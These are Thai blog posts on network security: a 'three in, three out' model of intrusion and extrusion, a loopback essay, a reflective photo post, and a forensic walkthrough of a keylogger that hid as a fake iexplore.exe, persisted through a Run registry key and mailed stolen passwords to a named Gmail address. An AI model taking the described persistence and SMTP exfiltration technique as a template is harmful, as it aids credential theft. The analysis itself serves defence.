ทุกครั้งที่ผมมีบรรยายเกี่ยวกับระบบ Network Security ผมมักจะกล่าวถึงหลักการของ 3 in 3 out เสมอ เป็นการพิจารณาจากความรู้สามัญทางด้านระบบเครือข่าย (Back to the Basic) เพื่อใช้ในการตัดสินใจวิเคราะห์ปัญหาระบบเครือข่าย และสถานะการณ์ที่เป็นอยู่จริงบนโลก IT เพื่อใช้ในการเชื่อมข้อมูลผ่านระบบอินเตอร์เน็ท (Information Technology Ontology)




3 in 3 out ออกเสียงว่า "ทรีอิน ทรีเอาต์" เป็นศัพท์ที่ผมตั้งขึ้นเอง ไม่มีในตำราเล่มใด
จุดประสงค์ที่เรียกศัพท์เช่นนี้ก็เพื่อ
1. ทำให้เข้าใจง่าย สำหรับการอธิบายความสัมพันธ์ การใช้งานบนระบบเครือข่ายในแต่ละชั้น
2. เพื่อใช้ในการวิเคราะห์ ถึงการไหลเวียนข้อมูลสารสนเทศ (Information) บนระบบเครือข่ายที่เป็นอยู่จริง
3. เพื่อใช้ในการวิเคราะห์ปัญหาระบบเครือข่าย และ เส้นทางลำเลียงข้อมูลสารสนเทศ ที่มีผลต่อภัยคุกคาม

3 in 3 out สามารถมองได้ 2 มุม คือ
มุมที่ 1 การไหลเวียนข้อมูลสารสนเทศที่เป็นอยู่จริง ตามกฏเกณฑ์ OSI 7 Layers และ TCP/IP
มุมที่ 2 ภัยคุกคามที่เกิดขึ้น ระหว่างการใช้งานข้อมูลสารสนเทศ ที่แบ่งได้เป็น ภัยจากภายนอกเข้าสู่ภายในระบบเครือข่าย (Intrusion) และ ภัยจากภายในออกสู่ภายนอกระบบเครือข่าย (Extrusion) เพื่อใช้ในการวิเคราะห์ สืบหาภัยคุกคามที่เกิดขึ้น

3 in 3 out คือการกำหนดลมหายใจ ของระบบเครือข่าย
เป็นเส้นทางลำเลียงข้อมูล เข้า และ ออก ไป บนการใช้งานจริงของเรา

ข้อมูล ที่เข้า และออก ในระดับ Internet เป็นข้อมูลจากโลกภายนอก ระดับ ISP (Internet Services Provider) หรือมองในระดับ WAN Technology ที่กำลังเข้าสู่ระบบเครือข่ายที่เราใช้งาน และ เป็นข้อมูลที่เราจะต้องทำการติดต่อออกไป จากภายในเครือข่ายที่เราใช้งาน เพื่อติดต่อออกไปตามเป้าหมายที่เราต้องการ ได้แก่ เราต้องการเปิด Web ไม่ว่าเป็นเว็บภายในประเทศ หรือ นอกประเทศ ก็เป็นการเชื่อมต่อแบบ HTTP port 80 ที่เป็นการติดต่อแบบ TCP การส่ง E-mail เชื่อมต่อแบบ SMTP port 25 ที่เป็น TCP เป็นต้น
ภายในระบบเครือข่ายของเรา ออกไปข้างนอก ต้องผ่านอุปกรณ์ Router จากฝั่งของเรา เพื่อไปยังจุดหมาย และเส้นทางลำเลียงข้อมูลสารสนเทศ จะดำเนินตามหลัก OSI 7 layer และ TCP/IP
พิจารณา Intrusion ภัยคุกคามทางข้อมูลที่ได้รับจากเส้นทางลำเลียงข้อมูลจาก ISP เข้าสู่ระบบเครือข่ายของเรา ส่วน Extrusion ภัยคุกคามทางข้อมูล ขา ออกเครือข่ายของเราไปยังโลกอินเตอร์เน็ท
อุปกรณ์ที่เราควรพิจารณา เส้นทางการลำเลียงข้อมูลเพื่อใช้ในการทำสืบหาการกระทำผิดทางอาชญากรรมคอมพิวเตอร์ (Network Forensics) ข้อมูลของ Log ที่เกิดขึ้นจากอุปกรณ์ Router ตามเส้นทางเดินทางของข้อมูล ทั้ง เข้า และ ออก ไปยังที่หมาย


ข้อมูล ที่เข้า และออกในระดับ Network เป็นข้อมูลจากเครือข่ายที่เราอยู่ ในระดับ LAN เราจะเริ่มพิจารณา ข้อมูล ที่เข้า และออกในระดับที่ ระดับชายแดนเครือข่าย (Perimeter Network) ตั้งแต่อุปกรณ์ Router ฝั่งเครือข่ายของเรา
พิจารณา Intrusion ภัยคุกคามทางข้อมูล ขา เข้าสู่ระบบเครือข่ายของเรา เป็นการเดินทางของข้อมูลจากอุปกรณ์ Router ฝั่งเครือข่ายของเรา ไปยัง Perimeter Network เข้าสู่วง LAN
พิจารณา Extrusion ภัยคุกคามทางข้อมูล ขา ออกจากระบบเครือข่ายของเรา จากวง LAN ไปสู่ Perimeter Network
ิอุปกรณ์ที่เราควรพิจารณา เส้นทางการลำเลียงข้อมูลเพื่อใช้ในการสืบหาการกระทำผิดทางอาชญากรรมคอมพิวเตอร์ (Network Forensics)
ทาง ขาเข้า คือ ข้อมูลของ Log ที่เกิดขึ้นจากอุปกรณ์ Internal Router , Network Firewall ,Core Switch , NIDS/IPS Access Switch , Proxy และ อุปกรณ์ Access Point (AP) เป็นต้น



ข้อมูล ที่เข้า และออกในระดับ Host
เป็นข้อมูลจากเครื่องคอมพิวเตอร์ที่ใช้งาน ในระดับ End Point ได้แก่ เครื่องแม่ข่าย (Computer Server) , เครื่องลูกข่าย (Computer Client) , Note book , PDA เป็นต้น
ข้อมูลในระดับ Internet เข้าสู่วง LAN และไปสิ้นสุดที่ End Point
พิจารณา Intrusion ภัยคุกคาม ขา เข้าสู่เครื่องคอมพิวเตอร์ของเรา (Host) เป็นการเดินทางข้อมูลจากเครือข่ายของเรา (LAN) ในจุดต่างๆ เข้าสู่เครื่องคอมพิวเตอร์ ที่อาจเป็นเครื่องแม่ข่าย , เครื่องลูกข่าย หรืออื่นๆ และแสดงผลข้อมูลผ่านระบบคอมพิวเตอร์ปลายทางที่เรียกใช้ข้อมูล
การพิจารณา Extrusion ภัยคุกคาม ขา ออกจากเครื่องคอมพิวเตอร์ของเรา (Host) ผ่านไปยังระบบเครือข่ายของเรา (LAN) ออกสู่ Perimeter Network และเดินทางไปสู่โลกอินเตอร์เน็ท (Internet)
เราควรพิจารณา เส้นทางการลำเลียงข้อมูลเพื่อใช้ในการสืบหาการกระทำผิดทางอาชญากรรมคอมพิวเตอร์ ในส่วนนี้คือ Log ที่เกิดจากอุปกรณ์ End point ได้แก่ เครื่องแม่ข่าย (Server) , เครื่องลูกข่าย (Client) , อุปกรณ์มือถือที่เชื่อมต่อเครือข่ายคอมพิวเตอร์ภายใน ออกสู่อินเตอร์เน็ทได้

Ontology ของระบบเครือข่ายคอมพิวเตอร์ เริ่มบรรเลงขึ้นพร้อมกับภัยคุกคามที่แฝงมากับความรู้เท่าไม่ถึงการณ์ของผู้ใช้งานต่อไป ตราบเท่าที่ระบบสารสนเทศยังมีใช้งานอยู่

นนทวรรธนะ สาระมาน
Nontawattana Saraman

บทความเกี่ยวข้อง สมุทัย เหตุของปัญหาเครือข่ายคอมพิวเตอร์ (27/11/49)

Monday, May 21

Loopback


บทความ My Ontology ปล่อยให้ งง มาเกือบหนึ่งเดือนแล้ว วันนี้คงเฉลยให้ฟัง ว่าที่เขียนเพื่อต้องการสื่ออะไรกัน ....

Loopback คือช่องทางการสื่อสารที่มีจุดจบเพียงจุดเดียว ข้อความใดก็ตามที่ส่งผ่านทางช่องดังกล่าว
ช่องนั้นก็จะได้รับทันที Internet Protocol (IP) กำหนดรายละเอียดเกี่ยวกับ lookback network ภายใต้ IPv4 เครือข่ายนี้ควรเป็น
network 0 (เครือข่ายนี้) และ local loopback address ของโฮสต์ควรเป็น 0.0.0.0 (โฮสต์นี้ที่อยู่ในเครือข่ายนี้)
แต่เนื่องจากมีการใช้ address นี้ไปในทางที่ผิด (โดยเฉพาะการใช้ host address 0 เพื่อเป็น broadcast
address) จึงมีการเปลี่ยนมาใช้ 127.0.0.1 เป็น loopback address แทน
traffic ที่โปรแกรมคอมพิวเตอร์ส่งไปยัง loopback network จะส่งไปยังคอมพิวเตอร์เครื่องเดียวกัน IP address
ที่มักใช้ใน loopback network คือ 127.0.0.1 สำหรับ IPv4 และ ::1 สำหรับ IPv6 ชื่อโดเมนสำหรับ address
นี้คือ localhost, loopback interface เป็น IP address ที่เรียกว่า circuitless หรือ virtual IP address
เนื่องจาก IP address นี้ไม่เชื่อมโยงกับ interface (หรือวงจร) ใด ๆ ในโฮสต์หรือเราเตอร์
มีการใช้ loopback interface ในหลาย ๆ ทางด้วยกัน เช่น ซอฟท์แวร์ที่เป็น network client ในคอมพิวเตอร์
ใช้เพื่อสื่อสารกับซอฟท์แวร์ server ที่อยู่ในคอมพิวเตอร์เครื่องเดียวกัน ในคอมพิวเตอร์ที่ทำงานเป็น web server
เมื่อเปิดที่ URL http://127.0.0.1/ ก็สามารถเข้าถึงเวบไซต์ในคอมพิวเตอร์เครื่องนั้นได้ โดยไม่จำเป็นต้อง
เชื่อมโยงเข้ากับเครือข่ายใด ๆ จึงมีประโยชน์ในการทดสอบ services โดยไม่จำเป็นต้องให้เข้าถึงได้จาก
ระบบอื่นภายในเครือข่าย นอกจากนี้การ ping loopback interface ยังเป็นการทดสอบขั้นต้นว่า IP stack ได้ทำงานอย่างถูกต้องด้วย


จากรูปหมายเลข 1 และ 3 คือการ Loopback IP กับซอฟต์แวร์ที่ใช้ในเครื่องตัวเอง เพื่อรอการใช้งานจริง (LISTENING) หมายเลข 2 เครื่อง Loopback IP ซอฟต์แวร์ที่ทำงานเสร็จสิ้นแล้ว (ESTABLISHED)

เช่นกันบทความ My Ontology มีอาการ Loopback นั่นหมายความว่า จุดแรก และ จุดสุดท้าย เป็นสิ่งเดียวกัน ส่วนช่วงกลางคือภาพลวงตา บนความฝันที่เกิดขึ้น , My Ontology ผม มันคือความว่างเปล่า (อนัตตา) นั้นเอง

จากภาพข้างบนแสดงถึง ประโยคแรก ส่วนเริ่มต้นเนื้อเรื่อง และ ประโยคสุดท้าย กล่าวเหมือนกันว่า "Ontology ผมคงเปลี่ยนไป .."

เป็นความตั้งใจที่ผมต้องการที่จะเขียนบทความสักเรื่อง ที่มีเนื้อหา วนกลับมาที่เดิม ส่วนใครจะตั้งใจให้มีสาระ หรือไม่มีสาระ หรือ อ่านแล้วไม่เข้าใจ และพยายามจะเข้าใจ นั่นไม่ใช่ประเด็นที่ต้องการ สุดแล้วแต่จิตนาการของผู้อ่าน หากมองอย่างไม่ซับซ้อน มันก็เพียงแค่การเขียนบทความให้เกิดอาการ Loopback นั่นเอง : )

ผลกระทบเมื่อเกิด Loopback บนเครือข่ายคอมพิวเตอร์ (Network) โดยเฉพาะอุปกรณ์คอมพิวเตอร์ เช่น Switch , Router มักจะทำให้เครื่อง Clinet ที่อยู่ภายใต้การควบคุมอุปกรณ์นั้น ใช้งานไม่ได้
ผลกระทบกับผู้อ่านบทความ เมื่อเกิด Loopback หากตั้งความหวังไว้ จะอ่านไม่รู้เรื่อง และหากพยายามจะที่จะให้รู้เรื่อง ก็จะได้คำตอบเหมือนเดิมที่เคยอ่านครั้งแรก

** สำหรับผมแล้ว Loopback พบได้บ่อย และมันเป็นเรื่องปกติ อย่างนั้นเอง (ตถตา)
Ontology เป็นการศึกษาเกี่ยวกับการดำเนินชีวิตจริงตามธรรมชาติ เช่นเดียวกับ ขันธ์ทั้ง 5 ทางพุธศาสนา เป็นสิ่งที่มีอยู่จริงตามธรรมชาติ ที่คนทั่วไปมักยึดเอาขันธ์มาเป็นตัวตน จึงเกิดการยึดมั่นถือมั่น เอามาเป็นตัวตนของตน จนก็เกิดทุกข์ในที่สุด
ความจริงสูงสุดคือ "อย่างนั้นเอง" ไม่ยินดีหลงรัก ไม่ยินร้ายหลงเกลียด มีความรู้สึกที่จะรัก และไม่เสียใจกับความรัก "Love means never having to say you're sorry" เพราะมันก็อย่างนั้นเอง ธรรมชาติทุกอย่างมันก็อย่างนั้นเอง อย่านำมาเป็นตัวตนของตน

นนทวรรธนะ สาระมาน
Nontawattana Saraman
20/05/2550

Wednesday, May 9

รอยยิ้มแห่งความหวัง

บทความ My Ontology ที่ผ่านมาผมเชื่อว่าหลายๆ คนที่อ่านแล้ว คงสงสัยอยู่บ้าง ว่าต้องการสื่ออะไร และความหมายของคำว่า Ontology มันคืออะไร ผมบอกใบ้ให้นิดล่ะกัน จากภาพ และคำบรรยายต่อไปนี้

เริ่มต้นวันใหม่ กับความหวังใหม่ ..

เราต้องอยู่รอด เพื่อไปถึงเป้าหมาย ที่หวังไว้

บางทีเมื่อเกิดปัญหา ก็ต้องแก้ไขเฉพาะหน้าไปบ้าง ..

บางที อาจท้อแท้ ..


บ่อยครั้งที่เรามีกำลังใจ

แล้วเราต้องการอะไร ?

สิ่งนี้หรือ ?

หรือสิ่งนี้ ?

อาจเป็นความสุข เล็กๆ น้อยๆ

แล้วมันจะขนาดไหน กัน ถึงจะสิ้นสุด ..


มันอาจอยู่ไกลแสนไกล เราก็ต้องเดินทางกันต่อไป ถึงแม้เราจะต่างกันในวิธีการเดินทาง เพื่อถึงเป้าหมายที่ตั้งไว้ ก็ตามแต่ ...

ถึงลำบาก เราก็ยังยิ้มได้

เพื่อดำเนินชีวิตอยู่ต่อไป .. ถึงแม้ .. ความหวังที่ตั้งเป้าหมายไว้ ยังไม่ทราบว่าเมื่อไหร่จะมาถึง

เป้าหมายที่ตั้งไว้ มันอยู่ ได้ทุกๆที่ เมื่อเรามีรอยยิ้ม

วันนี้คุณยิ้มหรือยัง ? : ) กับ รอยยิ้มแห่งความหวัง

บังเอิญไม่ได้ตั้งใจเขียนหลอก แต่ค้นหาข้อมูลแล้วพบรูปถ่ายพวกนี้ ส่วนตัวชอบภาพถ่ายแบบนี้ ประกอบกับบทความที่แล้ว สร้างความ สับสนกับความหมายที่สื่อแสดงออกไปบ้าง (หากคาดหวัง) จึงนำเอาภาพพวกนี้มาปะติปะต่อเป็นเรื่องราว ที่ตัวผมอยากให้เป็น

เพราะภาพพวกนี้คือ การดำเนินชีวิตจริง (Reality Life) หรือ Ontology ที่มีความหมายถึง การศึกษาเกี่ยวกับการดำรงอยู่ ที่เกี่ยวกับธรรมชาติของสิ่งที่เป็นจริง นั้นเอง

ขอทิ้งท้ายก่อนจบ ด้วยเพลง What A Wonderful World ของ Louis Armstrong





มองชีวิตด้วยใจสราญ

์Nontwattana Saraman

ที่มาของภาพ มาจาก http://www.zonaeuropa.com/weblog.htm
Humanizing China - Part 1 (Survival)

Humanizing China - Part 2 (Relationships)

Humanizing China - Part 3 (Desires)

** ดูภาพพวกนี้แล้ว เห็นว่ายังมีอีกตั้งหลายชีวิตที่อยู่บนโลกนี้ ลำบากกว่าเราอีกนะครับ เผื่อว่ามีกำลังใจในการใช้ชีวิตต่อไป

นนทวรรธนะ สาระมาน
Nontawattana Saraman

Tuesday, May 1

Shooter malware

วันก่อนได้ดูหนัง Action เรื่อง Shooter (2007) มา เวลาดูหนัง Action ไม่ต้องคิดถึงเหตุผล ครับ เน้นความมันส์ อย่างเดียว สนุกดีเหมือนกันครับ ยิงกันเลือดถ่วมจอ ได้บทเรียนจากหนังว่า การสุ่มยิงระยะไกล ต้องอาศัยฝีมือ ความแม่นยำ ประสบการณ์ และ ความเด็ดเดี่ยว รวมถึงต้องมีการวางแผนก่อนเสมอ : )
การสุ่มยิงที่ผมจะกล่าวต่อไป เป็นการยิง Malware ระยะไกลจากซีกโลกหนึ่งไปอีกซีกโลกหนึ่ง เชียวล่ะ ยิงจากที่หนึ่ง ไปฝังในเครื่องคอมพิวเตอร์ของเราและ พร้อมที่จะทำงานเมื่อถูกยิงเข้าไปแล้ว
เราจะลองผ่าพิสูจน์ Malware ชนิดนี้ดูว่ามันเป็นอย่างไง ?
(อ่านเพิ่มเติมความหมาย Malware ได้จาก http://nontawattalk.blogspot.com/2006/11/blog-post.html

จากเครื่องคอมพิวเตอร์ใน Office เครื่องหนึ่งมีอาการผิดปกติ (IP ใน Case นี้คือ 192.168.1.59) มีอาการอย่างน้อยดังนี้
1. จะปิดเครื่องได้ต้องถอดสายแลน (LAN) ออกเสมอ ถึงจะทำการ Shutdown ได้
2. RAM ในเครื่องใช้ไปครึ่งหนึ่ง ทั้งที่ไม่ได้เปิดโปรแกรมอะไรเลย
3. มีการส่งข้อมูลบางอย่างตลอดเวลา ***

อาการที่กล่าวมา ข้อ 1 และ 2 ยังไม่ทำให้ทำการ ผ่าพิสูจน์ (Computer Forensic) แต่อาการข้อ 3 นี้ปล่อยไม่ได้แล้ว และที่ทราบก็เพราะว่าที่ office เรามีระบบ SRAN นี้แหละ : ) ว่ามีข้อมูลจาก Protocol ใดส่งออกไปข้างนอก (Internet) บ้าง
จากนั้นก็ไปดูที่หน้าคอมเครื่องที่มีปัญหา (192.168.1.59) พิมพ์ netstat -an พบว่า
คลิกที่รูปเพื่อดูรูปขยาย
ดูจากนี้แล้ว พบว่ามีการติดต่อที่ตลอดเวลา ก็คือ ผ่าน Protocol Mail (SMTP) ใน port 25 และเป็นการติดต่อแบบ TCP ส่งไปที่ IP 72.14.253.27 เราตามต่อไปจาก IP ที่ว่ามันคือที่ไหนกันแน่ ?
ค้นหาแล้วพบว่า เมื่อดูย้อนกลับเป็น Domain แล้ว IP นี้ชื่อว่า po-in-f27.google.com

เป็น IP หนึ่งของ Google ที่ทำการ Computer Cluster กันอยู่ (ดูรายละเอียดเพิ่มเติม การเชื่อมโยง IP google ได้ที่ IP gogole map ) เราทราบแล้วล่ะว่า IP ดังกล่าวเป็น Mail Server ตัวหนึ่ง สำหรับผู้ใช้บริการ Gmail จากการเดาคือเครื่อง IP 192.168.1.59 ที่อยู่ office ผมนี้ติดอะไรสักอย่าง ที่ Anti virus / Anti Spyware ไม่รู้จัก และส่งข้อมูลไปที่ mail google ตลอดเวลา ขอเรียกว่า "Malware" แล้วกันนะ เครื่องนี้เป็น Note book ก็เป็นได้ว่าอาจจะติดจากที่อื่น และพอมาใช้งานใน office หากเป็นไวรัสที่กระจายพันธ์ได้ (Worm) ก็ทำให้เครื่องอื่นๆ พลอยติดเชื้อไปด้วย แต่นี้ Note book เครื่องนี้ไม่ได้ติดไวรัส นะสิ ไม่มีการกระจายพันธ์ ด้วยความอยากรู้มากกว่านั้น จึงเข้าไปสังเกตที่เครื่อง Note book ตัวนี้ว่ามี Process อะไรที่ทำงานบ้างจึงทำให้ RAM และ CPU ทำงานหนักเกินไป ทำการใช้ netstat (TCP View) บน SRAN Anti virus Software พบว่า
คลิกที่รูปเพื่อดูภาพขยาย
เราค้นพบว่า มีการส่งข้อมูลผ่านโปรแกรม ที่ชื่อว่า C:\WINDOWS\system32\Sys\iexplore.exeจากชื่อ file ที่ว่า ieplore.exe มันไม่มีจริงในระบบ Microsoft Windows คือเป็น file หลอกเกิดจากการสร้างของ Malware
จากนั้นเราทำการ ใช้โปรแกรม Process Explorer ของ Sysinternals ปัจจุบันถูก Microsoft Take over ไปแล้ว
คลิกที่รูปเพื่อดูภาพขยาย
Malware ตัวนี้พยายามซ้อนการทำงานกับโปรแกรมปัจจุบันที่เปิดแบบ Auto Run (ทำงานอัตโนมัติ) เทคนิคนี้เรียกว่าการทำ Hijack Process Software จาก files ที่เป็น .dll (เราเคยบทความการฝัง rootkit หรือ spyware ผ่านเทคนิคแบบนี้แล้วในบทความชื่อ Top Secret Windows สามารถอ่านเพิ่มเติมได้ ) เห็นว่าไปซ้อนการทำงานของโปรแกรม nod32kui.exe ซึ่งเป็นโปรแกรม Anti virus บนเครื่องนี้ (192.168.1.59) ซ้อนการทำงาน โปรแกรม Webcam ใน Notebook , Process windows XP อีกด้วย
สงสัยว่างานนี้จะยากที่จะลบ Malware ตัวนี้ออกไปง่ายๆแล้วล่ะ ก่อนลบนี้ขอดูว่าเป็น Malware ชนิดไหนแน่ จะได้ไหมนะ ?
เราต้องใช้เทคนิคที่เรียกว่า Reverse Engineering โดยนำ Malware (files ที่ชื่อว่า ieplore.exe และมีการ copy ตัวเองเป็นชื่อ ieplore.006 , ieplore.007) มาเปิดบน Hex Editor
http://www.hhdsoftware.com/images/screenshot-hex-editor.gif ภาพนี้ขอ censor เพราะเป็นการดักเอา password ที่เครื่อง IP 192.168.1.59 เก็บข้อมูลไว้ใน file ดังกล่าว โอ้ !!!
password ที่ Malware ต้องการคือ password mail , รหัส ID บัตรเครดิต เป็นต้น เหมือนขโมยขึ้นบ้านเลยครับ Malware ชนิดนี้ เป็นพวก Spyware Key logger ทำงานแบบ Stealth Mode นั้นเอง อ่านเพิ่มเติมได้ที่ http://virusdb.sran.org/archives/41
ทีมงานเราได้ทำการ ลงโปรแกรม Anti spyware มากกว่า 2 ชนิด เพื่อทำการลบ Malware ตัวนี้ พบว่าไม่เป็นผล ทั้งที่ทราบว่ามีการฝัง files ที่ Registy บน Windows ที่ HKLM\..\Run: [iexplore] C:\WINDOWS\system32\Sys\iexplore.exe

ผมจึงเปลี่ยนแผน ลบไม่ได้ ก็ต้องตามหาผู้บงการให้เจอแล้วกัน จึงทำให้เรามาดูทาง Network (เครือข่ายคอมพิวเตอร์) กันบ้าง ว่าการส่ง mail ไปยังที่ใดเพื่อหา e-mail ของขโมยรายนี้กัน

ก่อนอื่นเราทำการ TCPdump จากอุปกรณ์ SRAN (จากภาพข้างบน) ข้อมูลเฉพาะ port 25 และเลือกดูเฉพาะ IP ปัญหาคือ 192.168.1.59 ผลที่ได้คือ

หมายเลขที่ 1 ตรวจเฉพาะ port 25 และ IP 192.168.1.59 หมายเลขที่ 2 dump (.pcap) ข้อมูลเหตุการณ์ทุกอย่างที่เกิดขึ้นจาก 2 กรณีในหมายเลขที่ 1
จากนั้นนำมาเปิดในโปรแกรม wireshark เป็นโปรแกรม Network Analysis แบบ Sniffer ผลที่ได้คือ
คลิกที่รูปเพื่อดูรูปขยาย
เอาละ เรารูปตัวแล้วว่า เมื่อเครื่อง 192.168.1.59 เครื่องใน office ผม ที่ติด Malware ชนิด Spyware Keylogger ตัวนี้ ทำการส่งข้อมูลที่เป็น Password ต่างๆในเครื่องไปที่ e-mail ชื่อว่า stefuno@gmail.com
จนได้พบตัวการแล้ว แน่ๆ เครื่อง Note book ที่ติดกับดัก เจ้า stefuno นี้คงหาวิธีสมัยใหม่ลบลำบาก เพราะที่ดูจาก Reverse Engineering Malware ชนิดนี้แล้ว เป็นการแตกสายพันธ์ใหม่ที่ไม่ใช่รูปแบบเดิม คือการ modify malware ทำให้ Anti virus ไม่รู้จัก + Anti Spyware ไม่รู้จัก Note book (192.168.1.59) ต้องทำการลง OS (Operating System) ใหม่ถึงจะปลอดภัยที่สุด นี้แหละครับภัยคุกคามสมัยใหม่ มักจะเล่นงานที่ User และป้องกันยากที่สุดคือ Host (เครื่องคอมพิวเตอร์ส่วนตัวของเราๆ ท่านๆ นี้แหละ)
"คุณ stefuno ถ้า ยู แปลภาษาไทย เป็นภาษารัสเซียได้ รู้ไว้ว่า ยู ทำไม่ถูก ทำให้คนอื่นเดือดร้อน นะ : )"
คำถามต่อไปว่า คุณจะให้ผมทำไงกับ stefuno นี้ดี จะ Shooter แบบไหน comment มาได้ครับ แล้วจะจัดให้ ..

อ่านบทความเกี่ยวกับ Computer Forensic แบบฉบับของผมได้เพิ่มเติมที่
http://nontawattalk.blogspot.com/2004/10/trojan-optix-pro.html (10/2004) การตรวจจับ Trojan Optix
http://nontawattalk.blogspot.com/2005/02/ghost-malware.html(02/2005) Malware หน้าผี
http://nontawattalk.blogspot.com/2005/03/dark-side-of-internet.html (03/2005) Dark side of internet
http://nontawattalk.blogspot.com/2005/03/hackers-lose.html (03/2005) เมื่อ hackers หลงทาง

นนทวรรธนะ สาระมาน
Nontawattana Saraman